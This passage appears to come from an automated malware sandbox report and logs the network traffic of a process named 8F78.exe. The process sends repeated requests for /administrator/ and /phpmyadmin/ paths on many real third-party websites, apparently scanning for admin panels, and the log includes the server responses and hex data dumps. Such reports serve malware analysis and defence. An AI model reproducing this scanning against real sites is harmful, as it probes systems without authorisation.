                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.664623976 CET1286INData Raw: 41 d6 18 bd 55 c0 08 ea 5b d9 eb fc a2 aa 25 6f 40 23 7d a7 ae 25 23 5e 39 ff b6 43 4a 72 a4 e5 4a 92 43 4c 84 19 3d a9 13 39 8f 41 32 09 c3 3c e7 71 4e cf 5a 65 5f 0e 66 d6 94 05 f3 68 68 f2 0b 69 f7 60 98 2f ea 17 9e 0c ed 5b 18 60 54 15 bf 5a
                                                                                                                                                                                                                                                                                                                                Data Ascii: AU[%o@#}%#^9CJrJCL=9A2<qNZe_fhhi`/[`TZJR3CU,`~70,KsZpL@(sHWx<2jrtAUe ?V26}P|gF9"vB~Qz-x|}{W"N@%IQ4vAC-)ZDP|
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.664676905 CET258INData Raw: 9b 27 6f af a6 97 79 ca 93 d2 9c 59 70 2f e4 f1 03 cf 5d cf 86 99 54 94 e5 d1 2c e3 1e 9e 9d 65 04 9b 19 b0 ec dc 2f d4 0d 7e ae 60 d5 63 26 ed e1 ce bd 48 33 7c 93 7a ec 40 b4 05 df 08 ee 96 13 b3 62 c5 aa e9 2f 3d a5 2b 9e cc 37 a6 8d 49 0d fb
                                                                                                                                                                                                                                                                                                                                Data Ascii: 'oyYp/]T,e/~`c&H3|z@b/=+7I?f&ykd./Vqlv++M]r/LRmLynw6s)!swyckjC. ]H7'lQQ '
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.667133093 CET228OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: tsutomu.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://tsutomu.com/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.941847086 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/8.1.17
                                                                                                                                                                                                                                                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fCofrBGlE11sJecKmZ0DHAgn6/FCW+6ndZ/VRWumhH/05bbXCDVChQ4g9/2EG6rV+keqZaPTwFxIhaPqhXLjiQ==
                                                                                                                                                                                                                                                                                                                                last-modified: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                x-cache-miss-from: parking-56c7b4c6cb-55ds5
                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 32 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 50 cb 72 da 30 14 fd 15 c5 8b 6e 12 30 24 94 09 53 cc 8c 31 26 21 90 04 27 24 3c 36 1d 59 be 46 0a b2 44 24 19 41 57 fd 8d fe 5e bf a4 32 74 a6 c9 a2 1b 5d dd ab 73 ee 39 47 dd b3 c1 63 34 5b 4e 63 44 4d c1 7b dd ea 44 1c 8b 75 e0 81 f0 10 ca b0 c1 35 9c a5 5c 92 cd 06 0e c1 fd d0 da 41 b2 bc 1b cb d5 88 ee c8 43 98 c4 fd 7e 12 0e 9e 6d 68 9f c3 bb 7e f8 20 0e 7c 6e 2f 77 93 65 8b be 88 8e 6d b4 7f 24 e3 94 8e fb f9 ee 6d f8 12 e9 6c c8 d3 f6 2c 4b e8 3e ed 3c 2d e6 8b 72 d4 32 57 4d 72 2e af f3 e5 e3 ce d7 d7 ef cd c9 cd 74 8d af 06 71 73 e2 9b db 97 d6 24 7e b8 8f 42 1b 87 61 12 04 df f3 48 e6 aa 7f c3 e3 66 53 df 01 19 17 ab c6 e0 36 5c 8b b6 3f 8c e6 e7 6d 91 ad fc d7 a7 79 59 d0 5b bf f1 35 4d 17 d1 e0 35 a2 49 6b dd f1 2f e3 9b b6 7a 3d df c0 fb 0a 4f 67 76 b8 1f 51 3c 7d a7 8b c9 1b 73 8b 5d 74 c0 59 af 5b 80 c1 88 50 ac 34 98 c0 2b 4d 5e bb f6 7a 5d c3 0c 87 9e d1 a5 91 45 59 27 b2 f8 22 52 bd fd 56 3b 95 19 65 1a 59 48 35 33 80 dc 35 97 0a 69 cc e1 ec 13 ea 2f 1b 3d 81 96 a5 22 a0 11 16 19 1a 09 87 2e b0 61 52 d4 bb fe 49 e7 64 42 e0 02 02 6f c7 c0 6e a5 32 1e 22 52 18 10 ce 94 65 99 a1 41 06 3b 46 a0 76 6c 2e 98 60 86 61 5e d3 c4 c9 06 cd 7a e3 a2 c0 7b 56 94 c5 87 49 a9 41 1d 5b 9c ba 49 c3 fb 24 93 81 26 8a 6d 2b 1b 1f 94 fe 1b 0c 7d f8 8a ea e1 e0 12 a1 9c 29 6d 8e a1 52 70 97 53 ca 23 07 73 8e 64 8e 0c 75 5b fe e5 ad 58 bf 7f fe 52 80 b8 94 1b 26 d6 15 b6 8e 86 ca ed 5c 83 00 85 39 32 72 cb 88 76 05 15 d2 01 dd 12 4b b1 a9 98 c8 ca 92 67 08 f6 5b 20 a6 02 e4 cc 29 53 50 70 f1 c9 1d c5 1a 31 53 59 a8 a3 3f 00 00 00 ff ff 0d 0a 35 37 31 0d 0a ac 59 5b 6f db 36 14 7e df af d0 52 04 68 3b d1 96 9d d8 71 a4 6d c0 f6 b2 0d e8 80 3d 14 db 80 22 28 28 89 b2 d9 48 a2 20 4a 8e 5d 4d ff 7d 87 17 5d a8 8b 9b 14 6d d0 c6 26 cf 39 3c 97 ef 5c c8 fe 43 ac 03
                                                                                                                                                                                                                                                                                                                                Data Ascii: 213tPr0n0$S1&!'$<6YFD$AW^2t]s9Gc4[NcDM{Du5\AC~mh~ |n/wem$ml,K><-r2WMr.tqs$~BaHfS6\?myY[5M5Ik/z=OgvQ<}s]tY[P4+M^z]EY'"RV;eYH535i/=".aRIdBon2"ReA;Fvl.`a^z{VIA[I$&m+})mRpS#sdu[XR&\92rvKg[ )SPp1SY?571Y[o6~Rh;qm="((H J]M}]m&9<\C
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.942116022 CET1286INData Raw: cb 88 64 97 e4 ad 30 0c c2 39 c1 79 70 d0 7a 7c 0f fe 89 69 fa f8 9d a5 ff e4 24 fe e9 8a 82 6b ae da a5 e2 9c 81 eb 68 82 f7 64 99 a5 fb 6e e3 90 93 e8 a7 ab e5 92 26 fb 05 27 21 cb 70 2e ec 13 fa 2c 0b 92 64 31 2e 08 5f c6 6c cf f8 52 ec 7f 14
                                                                                                                                                                                                                                                                                                                                Data Ascii: d09ypz|i$khdn&'!p.,d1._lRRyqoR~&sxpw!)X{]YwXm<pTS8PB*98 }{N11!#"W68Arp5>&kxZb
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.942193031 CET1119INData Raw: f3 22 03 c0 f8 23 0e ce 7f 31 b8 52 9c 2f db 60 90 3e df 8c 69 b6 97 ba 99 3d 52 82 12 18 93 f0 9e 54 ed e5 24 a2 0d 0a 34 33 30 0d 0a 27 12 7a ba 66 c1 74 d5 8d 5c fd 96 b7 89 c4 cf 30 6d 75 5e 22 71 51 91 69 db 2c 68 71 c3 5a 6e ea 30 8d fd 28
                                                                                                                                                                                                                                                                                                                                Data Ascii: "#1R/`>i=RT$430'zft\0mu^"qQi,hqZn0(bb~ Y p?X|~lr}g0"/lBU10ztEN6YSMC4}z8v%o<i;+qTC{b4>4UF3wYF
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.942486048 CET1286INData Raw: 35 37 31 0d 0a e4 5b 79 6f ea 48 12 ff 7f 3f 85 d7 ab 89 34 52 48 7c 70 84 bc 90 51 5e 20 19 50 6c 72 38 07 5e 8d a2 f6 01 b6 b1 c1 63 9b f3 e9 7d f7 ad ea b6 c1 18 78 f0 56 2b ad 66 17 25 e0 ae ae be aa 7f dd 55 5d 5d 1e 30 95 74 56 a5 c1 0d db
                                                                                                                                                                                                                                                                                                                                Data Ascii: 571[yoH?4RH|pQ^ Plr8^c}xV+f%U]]0tVlj=MMg#:Pu|LpI<'o'u>+mLzCSkA$E[xQzCQ"l^rs/8VuAM3m2
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.942558050 CET1286INData Raw: a4 8f 73 8d ba e1 74 c3 d4 e0 51 03 00 cd c1 bd 1f 56 09 2a 11 2a 4a d8 2e 4c 87 8c 46 36 cd 98 87 25 58 20 f5 53 f6 50 11 4f c9 64 4e 4a 69 94 75 49 3c 95 ca 95 1a 5d 26 04 cb fe f3 0f 7c 98 f2 97 22 fd 4d e8 43 e4 a7 39 2c e0 f3 99 79 dd 1e d0
                                                                                                                                                                                                                                                                                                                                Data Ascii: stQV**J.LF6%X SPOdNJiuI<]&|"MC9,y_0aG:I9<>2A3!B%Ah(pxES'5I3r]Zf9Bm|4i+oT3I&d,VV(UTm:13


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                60192.168.2.45388759.106.13.82805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.402745008 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: oitacity.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.699876070 CET343INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: http://www.oitacity.jp/administrator/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                61192.168.2.45397737.9.175.180805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.406914949 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.662451029 CET384INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 166
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Location: http://kanapy.sk/eshop
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.665936947 CET164OUTGET /eshop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.921412945 CET385INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 166
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Location: https://kanapy.sk/eshop
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                62192.168.2.45397537.9.175.180805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.408983946 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.668153048 CET384INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 166
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Location: http://kanapy.sk/eshop
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.668359041 CET164OUTGET /eshop HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: kanapy.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.926100016 CET385INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 166
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=10
                                                                                                                                                                                                                                                                                                                                Location: https://kanapy.sk/eshop
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                63192.168.2.45388659.106.13.82805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.409449100 CET175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: oitacity.jp
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.715044975 CET343INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: http://www.oitacity.jp/administrator/
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                64192.168.2.45398189.46.109.20805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.409909010 CET181OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: emmetisportfun.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.662919998 CET425INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 168
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: http://www.emmetisportfun.it/administrator/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy175.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                65192.168.2.45411523.239.22.202805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.485050917 CET172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: aexoden.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.680149078 CET429INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://aexoden.com:443/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubdomains
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                66192.168.2.45426854.161.222.85805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.539609909 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: hokal.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.867991924 CET148INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:26 GMT
                                                                                                                                                                                                                                                                                                                                location: https://www.hugedomains.com/domain_profile.cfm?d=hokal.com


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                67192.168.2.45426954.161.222.85805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.539834976 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: hokal.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
